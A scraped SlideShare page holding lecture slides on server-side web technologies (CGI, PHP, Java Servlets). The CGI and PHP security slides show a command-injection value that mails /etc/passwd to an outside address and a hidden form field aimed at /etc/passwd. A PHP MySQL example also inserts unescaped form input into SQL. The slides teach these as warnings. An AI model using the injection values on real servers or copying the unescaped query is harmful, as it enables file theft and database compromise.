Introduction About PHP Introduction About PHP
Introduction About PHP
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
HTTP
HTTPHTTP
HTTP
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
 
XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)XML-RPC (XML Remote Procedure Call)
XML-RPC (XML Remote Procedure Call)
 
HTTP
HTTPHTTP
HTTP
 
Web technologies: HTTP
Web technologies: HTTPWeb technologies: HTTP
Web technologies: HTTP
 
Edp bootstrapping a-software_company
Edp bootstrapping a-software_companyEdp bootstrapping a-software_company
Edp bootstrapping a-software_company
 

Andere mochten auch

How to think like a startup
How to think like a startupHow to think like a startup
How to think like a startupLoic Le Meur
 
Teaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakTeaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakShelly Sanchez Terrell
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerLuminary Labs
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsLinkedIn
 

Andere mochten auch (6)

Web-GIS used to support and strengthen Environmental and Social Management Pl...
Web-GIS used to support and strengthen Environmental and Social Management Pl...Web-GIS used to support and strengthen Environmental and Social Management Pl...
Web-GIS used to support and strengthen Environmental and Social Management Pl...
 
Inaugural Addresses
Inaugural AddressesInaugural Addresses
Inaugural Addresses
 
How to think like a startup
How to think like a startupHow to think like a startup
How to think like a startup
 
Teaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakTeaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & Textspeak
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI Explainer
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving Cars
 

Ähnlich wie Server-side Technologies: CGI, PHP, Java Servlets, JSP

Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.pptRonakBothra8
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.pptProjectCexsys
 
Hypertext Mark Up Language Introduction.
Hypertext Mark Up Language Introduction.Hypertext Mark Up Language Introduction.
Hypertext Mark Up Language Introduction.JohnLagman3
 
Basics of HTML.ppt
Basics of HTML.pptBasics of HTML.ppt
Basics of HTML.ppthandu18
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechkaran saini
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtechArpit Meena
 
Web-Technologies 26.06.2003
Web-Technologies 26.06.2003Web-Technologies 26.06.2003
Web-Technologies 26.06.2003Wolfgang Wiese
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder
 
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)Carles Farré
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 

Ähnlich wie Server-side Technologies: CGI, PHP, Java Servlets, JSP (20)

CGI by rj
CGI by rjCGI by rj
CGI by rj
 
Unit 02: Web Technologies (2/2)
Unit 02: Web Technologies (2/2)Unit 02: Web Technologies (2/2)
Unit 02: Web Technologies (2/2)
 
PPT
PPTPPT
PPT
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.ppt
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.ppt
 
Hypertext Mark Up Language Introduction.
Hypertext Mark Up Language Introduction.Hypertext Mark Up Language Introduction.
Hypertext Mark Up Language Introduction.
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.ppt
 
Basics of HTML.ppt
Basics of HTML.pptBasics of HTML.ppt
Basics of HTML.ppt
 
Chowdhury-webtech.ppt
Chowdhury-webtech.pptChowdhury-webtech.ppt
Chowdhury-webtech.ppt
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Chowdhury webtech
Chowdhury webtechChowdhury webtech
Chowdhury webtech
 
Web-Technologies 26.06.2003
Web-Technologies 26.06.2003Web-Technologies 26.06.2003
Web-Technologies 26.06.2003
 
Css Founder.com | Cssfounder Net
Css Founder.com | Cssfounder NetCss Founder.com | Cssfounder Net
Css Founder.com | Cssfounder Net
 
Copy of cgi
Copy of cgiCopy of cgi
Copy of cgi
 
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
Apache Web Server Setup 3
Apache Web Server Setup 3Apache Web Server Setup 3
Apache Web Server Setup 3
 
5-WebServers.ppt
5-WebServers.ppt5-WebServers.ppt
5-WebServers.ppt
 

Kürzlich hochgeladen

Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 

Kürzlich hochgeladen (20)

Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 

Server-side Technologies: CGI, PHP, Java Servlets, JSP

  • 1. Server-side Technologies CGI, PHP, Java Servlets, JSP Denis Helic
  • 2. Server-side Technologies: Historical Background(1/3) Server-side = Web server side At the beginning the Web was a static information system Web servers served documents, images, etc. Static information stored on the server side (file system) No interaction between users and the Web (except browsing) (2/95)
  • 3. Server-side Technologies: Historical Background(2/3) There was a need for more interaction between users and the system (e.g. phone books) HTML forms Server needed to respond differently depending on values submitted by users Dynamic response by server (3/95)
  • 4. Server-side Technologies: Historical Background(3/3) Need to extend the functionality of Web servers Don’t add the new functionality into Web servers directly Just allow Web servers to communicate with external programs External programs generate dynamic content depending on values sub- mitted by HTML form Dynamic content forwarded to Web server Web server responds with dynamic content (4/95)
  • 5. Server-side Technologies: Today More than just evaluating of HTML forms Dynamic content needed for: Sophisticated user interaction (e.g. search engines, shopping carts) Content changes often (e.g. weather forecast, news headlines) Web gateways to database-based applications (e.g. prices of products, online ticket reservations) (5/95)
  • 6. Communication between Web server and external programs How should Web server communicate with external programs? Passing parameters, getting response, etc. Standardized communication mechanism Standard created by Web consortium (6/95)
  • 7. Common Gateway Interface (CGI) CGI is a specification of communication between Web server and external programs Current version CGI 1.1 http://hoohoo.ncsa.uiuc.edu/cgi/interface.html Very general approach, can be applied for different applications Not only HTML form evaluation Web server must implement CGI specification All major Web servers do! (e.g. Apache, IIS, etc.) (7/95)
  • 8. CGI Specification(1/4) Environment variables System specific variables set by Web server External program reads environment variables and obtains data about client request CONTENT_LENGTH, CONTENT_TYPE, REMOTE_ADDR, REMOTE_HOST, etc. Command line Using a special HTML tag user sends a command line to the server Command line executed on the server (8/95)
  • 9. CGI Specification(2/4) Standard Input Used by the server to send client data to external program Standard Output Used by external program to send response to the server (write HTML to standard output) (9/95)
  • 10. CGI Specification(3/4) HTTP method used by the client: GET or POST GET method: external program reads environment variables QUERY_STRING special environment variable containing data submit- ted by user (e.g. HTML form data) POST method: external program reads from standard input External program needs to parse the input (10/95)
  • 11. CGI Specification(4/4) CGI specification allows external programs to be written in any program- ming language UNIX shell scripts, Perl scripts, C programs, C++ programs Even PHP as CGI or Java as CGI (11/95)
  • 12. CGI Examples(1/7) Example 1: Hello World: CGI as UNIX shell script GET method, no parameters from client Write HTML to stdout #!/bin/sh # send http-header and a newline afterwards: echo "Content-Type: text/html" echo "" (12/95)
  • 13. CGI Examples(2/7) Example 1 (continued): # send html content: echo "<HTML>" echo " <HEAD>" echo " <TITLE>Hello World CGI</TITLE>" echo " </HEAD>" echo " <BODY>" echo " Hello World (" date "+%T, %d.%m.%Y" echo ")" echo " </BODY>" echo "</HTML>" Example: http://coronet.iicm.edu:8080/cgi-bin/mmis/hello_world.sh (13/95)
  • 14. CGI Examples(3/7) Example 2: Dump environment variables: CGI as Perl script GET method, no parameters from client Write HTML to stdout #!/usr/bin/perl require "cgi-lib.pl"; print &PrintHeader; print "<hr>"; print &PrintEnv; (14/95)
  • 15. CGI Examples(4/7) Example 2 (continued): Example: http://coronet.iicm.edu:8080/cgi-bin/mmis/printenv.pl Special CGI library in Perl: cgi-lib Provides functions for parsing input, parsing parameters, writing headers, etc. cgi-lib homepage: http://cgi-lib.berkeley.edu/ (15/95)
  • 16. CGI Examples(5/7) Example 3: Dump QUERY_STRING: CGI as Perl script GET method, with parameters from client Write HTML to stdout Parameters encoded in Url: http://coronet.iicm.edu:8080/cgi-bin/mmis/printenv.pl? action=search&sourceid=google&q=query Parameters forwarded as an environment variable (QUERY_STRING) to program special characters encoded by %’ and ASCII-value (hex) restricted to 1024 bytes! (16/95)
  • 17. CGI Examples(6/7) Example 4: Evaluate HTML forms: CGI as Perl script POST method, with parameters from client, read from stdin Write HTML to stdout #!/usr/bin/perl require "cgi-lib.pl"; if (&ReadParse) { print &PrintHeader, &PrintVariables; } else { print &PrintHeader,’<form><input type="submit"> Data: <input name="myfield">’; } (17/95)
  • 18. CGI Examples(7/7) Example 4 (continued): Example: http://coronet.iicm.edu:8080/mmis/examples/cgi/form.html <form action ="/cgi-bin/mmis/handle_form.pl" method ="POST" enctype= "multipart/form-data"> Another CGI example: http://www-scf.usc.edu/~csci351/Special/CGIinC/examples. html (18/95)
  • 19. CGI Applications(1/2) Long list of different applications: Simple: Hit counters, current date, etc. Handling HTML forms, search engines, imagemaps, databases WWW gateways! (19/95)
  • 20. CGI Applications(2/2) Finger gateway: http://coronet.iicm.edu:8080/cgi-bin/mmis/finger.pl Source: http://coronet.iicm.edu:8080/mmis/examples/cgi/ finger.pl Mail gateway: http://coronet.iicm.edu:8080/cgi-bin/mmis/mailto.pl Source: http://coronet.iicm.edu:8080/mmis/examples/cgi/ mailto.pl (20/95)
  • 21. CGI Security Check parameters carefully!!! if($email =~ /[^a-zA-Z0-9_-.@]/){ $_ = "The email address should be of the form <i>user@server</i>!"; }else{ $_ = qx($finger $email); } Suppose this e-mail address: something ; mail bad@address.com < /etc/passwd Basically you let other people start programs on the server Check what they want to do on your server!!! Not only CGI! (PHP, Java Servlets, etc.) (21/95)
  • 22. CGI - Perl Larry Wall: Practical Extraction and Reporting Language String manipulations, regular expressions Very powerful Strange syntax :-) (e.g. 1 while s/[(][^()]*[)]//;) Tutorials about perl/cgi: Chapter about CGI in SelfHTML: http://courses.iicm.edu/mmis/selfhtml80/cgiperl/ index.htm http://www.comp.leeds.ac.uk/nik/Cgi/start.html (22/95)
  • 23. PHP: Hypertext Preprocessor http://www.php.net (NOT http://www.php.com = Parents helping Parents :-)) General purpose scripting language, especially suited for Web develop- ment PHP script can be embedded into HTML documents PHP script is interpreted on a Web server PHP interpreter used as a CGI-program PHP interpreter as a plug-in of a web-server (e.g. Apache module) (23/95)
  • 24. PHP: Hello World(1/3) Embed PHP script into an HTML file Upload the file onto a Web server using extension .php Embedding PHP in HTML: < ? ... ? > <?php ... ?> <script language=”php”> ... </script> <% ... %> (24/95)
  • 25. PHP: Hello World(2/3) Example: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Hello World</title> <meta http-equiv = "Content-type" content = "text/html; charset=iso-8859-1"> <link rel = "stylesheet" type = "text/css" href = "style.css"> </head> <body> <? echo "Hello World! "; echo "("; echo date ("l dS of F Y h:i:s A"); echo ")"; ?> </body> </html> (25/95)
  • 27. PHP: Syntax PHP syntax close to C and Java Object-oriented approach Control structures Weakly-typed variables (prefix ’$’) Operators, etc. (27/95)
  • 28. PHP: Applications Wide range of applications (similar to CGI) Forms handling, etc. Wide range of PHP libraries Network connectivity (e.g. access FTP, IMAP, SMTP, etc.) TU Webmail: https://sbox.tugraz.at/ Socket programming Database connectivity (e.g. MySQL, dBase, Oracle, etc.) XML/XSLT manipulation Image manipulation (28/95)
  • 29. PHP: Handling Forms(1/8) PHP interpreter initializes variables correpsonding to form fields <form action ="/mmis/examples/php/env_vars/printvar.php" method="GET" enctype= "multipart/form-data"> Name: <input type = "text" name = "name" size = "20" maxlength = "50"> Second Name: <input type = "text" name = "second_name" size = "20" maxlength = "50"> Matrikel Number: <input type = "text" name = "nr" size = "20" maxlength = "50"> ... <input type = "submit" value = "Register"> </form> (29/95)
  • 30. PHP: Handling Forms(2/8) PHP form variables: Alternative 1 PHP variables have same names as form fields $name for name, $nr for nr, etc. <?php echo "<table>n"; echo "<caption>Variables</caption>n"; echo "<tr><th>Key</th><th>Value</th></tr>n"; echo "<tr><td>Name</td><td>$name</td></tr>n"; echo "<tr><td>Second Name</td><td>$second_name</td></tr>n"; echo "<tr><td>Matrikel Number</td><td>$nr</td></tr>n"; echo "<tr><td>Study Field</td><td>$study_field</td></tr>n"; echo "</table>n"; ?> (30/95)
  • 31. PHP: Handling Forms(3/8) Example with GET: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ var_get.html Example with POST: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ var_post.html Example PHP: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ printvar.php Source PHP: http://coronet.iicm.edu:8080/mmis/examples/php/env_vars/ printvar.phps (31/95)
  • 32. PHP: Handling Forms(4/8) PHP form variables: Alternative 2 Access form fields through PHP array $HTTP_POST_VARS for POST method $HTTP_GET_VARS for GET method $name = $HTTP_POST_VARS["name"]; ... $name = $HTTP_GET_VARS["name"]; (32/95)
  • 33. PHP: Handling Forms(5/8) PHP form variables: Alternative 3 Access form fields through PHP array $_POST for POST method (>=PHP4.1.0) $_GET for GET method (>=PHP4.1.0) $name = $_POST["name"]; ... $name = $_GET["name"]; (33/95)
  • 34. PHP: Handling Forms(6/8) Handling forms: Security issues Similar problems like with CGI We need to check parameters sent by users very carefully!!! PHP form variables: Alernative 1 Has a lot of security issues, since variables are globally defined (34/95)
  • 35. PHP: Handling Forms(7/8) Example of security problem with global form variables $tempfile = "12345.tmp"; ... handle form variables ... ... do something with tempfile ... unlink($tempfile); (35/95)
  • 36. PHP: Handling Forms(8/8) Example of security problem with global form variables (continued) Suppose a following HTML form: <input type = "hidden" name = "tempfile" value = "/etc/passwd"> php.ini: register_globals=Off!!! >=PHP4.2.0 by default off Use $HTTP_POST_VARS or $_POST instead (36/95)
  • 37. PHP: Database Manipulation(1/5) Huge advantage of PHP: great support for database connectivity Adabas-D, mSQL, MySQL, Oracle, Postgres, Slid, Sybase/Sybase- CT, Velocis, dBase-Files, filePro-Dateien, ODBC, ...) Most notably: PHP/MySQL Advanced features: Persistent database connections Huge advantage over CGI for example! (37/95)
  • 38. PHP: Database Manipulation(2/5) Example: Inserting and retrieving data from MySQL database Form: http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ form.html (38/95)
  • 39. PHP: Database Manipulation(3/5) <?php $name = $HTTP_POST_VARS["name"]; $second_name = $HTTP_POST_VARS["second_name"]; $nr = $HTTP_POST_VARS["nr"]; $study_field = $HTTP_POST_VARS["study_field"]; ... mysql_connect() or die("Unable to connect to database server"); @mysql_select_db("$dbname") or die("Unable to select database"); ... $query = "INSERT INTO $tablename VALUES (’$name’, ’$second_name’, ’$nr’, ’$study_field’, ’null’)"; $result = mysql_query($query) or die (mysql_error()); ... mysql_close(); ?> (39/95)
  • 40. PHP: Database Manipulation(4/5) Inserting data with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ register.phps Retrieving data with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ get_registered.php (40/95)
  • 41. PHP: Database Manipulation(5/5) ... while($i < $rows){ $name = mysql_result($result, $i, "name"); $second_name = mysql_result($result, $i, "second_name"); $nr = mysql_result($result, $i, "nr"); $study_field = mysql_result($result, $i, "study_field"); ... echo "<tr><td>$name</td><td>$second_name</td><td>$nr</td><td> $i++; } ... Retrieving data with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/mysql/ get_registered.phps (41/95)
  • 42. PHP: XML Manipulation(1/3) Additional PHP library for manipulating XML data PEAR library: http://pear.php.net/ Packages for networking, scientific calculations, file system, databases, XML, XSLT, etc. XML_Tree one of the packages in the PEAR library (42/95)
  • 43. PHP: XML Manipulation(2/3) header("Content-Type: text/xml"); include("XML/Tree.php"); $tree = new XML_Tree(); $root =& $tree->addRoot("Course"); ... while($i < $rows){ $reg =& $root->addChild("registered"); $student =& $reg->addChild("Student"); $name = mysql_result($result, $i, "name"); $student->addChild("name", $name); ... $i++; } ... $tree->dump(); (43/95)
  • 44. PHP: XML Manipulation(3/3) Retrieving data (as XML) with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/xml/get_ registered.php Retrieving data (as XML) with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/xml/get_ registered.phps (44/95)
  • 45. PHP: Image Manipulation(1/3) Generate not only HTML, but digital images as well! PHP compiled with GD graphical library Standard installation comes with some GD version GD Library: http://www.boutell.com/gd/ (45/95)
  • 46. PHP: Image Manipulation(2/3) Header("Content-Type: image/png"); ... $im = ImageCreateTrueColor(400, 300); ... ImageFill($im, 0, 0, $white); ... ImageArc($im, 150, 150, $diameter, $diameter, $last_angle, ... ImageFillToBorder($im, $mid_x, $mid_y, $black, $colors[$z]); ... ImageFilledRectangle($im, 300, ($z - 1) * 30 + 10, 320, ($z - 1) * 30 + 20, $colors[$z]); ImageString($im, 5, 330, ($z - 1) * 30 + 10, $fields[$z], $black); ImagePNG($im); (46/95)
  • 47. PHP: Image Manipulation(3/3) Retrieving data (as PNG image) with PHP: http://coronet.iicm.edu:8080/mmis/examples/php/image/ get_stats.php Retrieving data (as PNG image) with PHP (source): http://coronet.iicm.edu:8080/mmis/examples/php/image/ get_stats.phps (47/95)
  • 48. PHP: Tutorials and Resources PHP Introductory Tutorial: http://www.php.net/tut.php PHP/MySQL Tutorial: http://hotwired.lycos.com/webmonkey/programming/php/ tutorials/tutorial4.html PHP for beginners: http://www.skyhome.de/php/ PHP4 - Webserver-Programmierung f¨r Einsteiger (book): u http://www.galileocomputing.de/openbook/php4/ Developer Resources http://www.devshed.com/Server_Side/PHP Datenbank, MySQL und PHP: http://ffm.junetz.de/members/reeg/DSP/ SelfPHP:http://www.selfphp.info/index.php. (48/95)
  • 49. Java Servlets and Java Server Pages (JSP) Intro tutorial: http://www.apl.jhu.edu/~hall/java/Servlet-Tutorial/ Book: Marty Hall, Core Servlets and JavaServer Pages, Sun Press/Pren- tice Hall (http://www.coreservlets.com) Java servlets: server side Java applications Java server pages: Java code mixed into HTML Java applets: client-side applications (49/95)
  • 50. Java Servlets Java technology’s answer to CGI programming Java programs that run on a Web server Java servlet engine (container) Official Reference Implementation: Apache Tomcat http://jakarta.apache.org/tomcat/index.html Current version: 5.5.4 (50/95)
  • 51. Java Servlets: Advantages(1/4) Efficient With traditional CGI: for each request a new OS process is started Java VM, servlet container, and a particular servlet started only once: each request handled by a Java thread Lightweight Java threads instead of heavyweight OS processes With CGI: if N simultaneous requests than the code is loaded N times With servlets: N threads but only one copy of code in the memory Optimization possibilites with servlets: caching, keeping database connections open, etc. answer from CGI: Fast-CGI (http://www.fastcgi.com) (51/95)
  • 52. Java Servlets: Advantages(2/4) Convinient If you already know Java (most probabaly you do ;)) Huge Java software libraries Libraries for handling cookies, sessions, etc. (52/95)
  • 53. Java Servlets: Advantages(3/4) Powerful Java servlets can talk directly to the Web server (e.g. lookup for images stored in standard places) Servlets can share data among each other (e.g. database connection pools) Maintain information from request to request (e.g. session tracking, caching) (53/95)
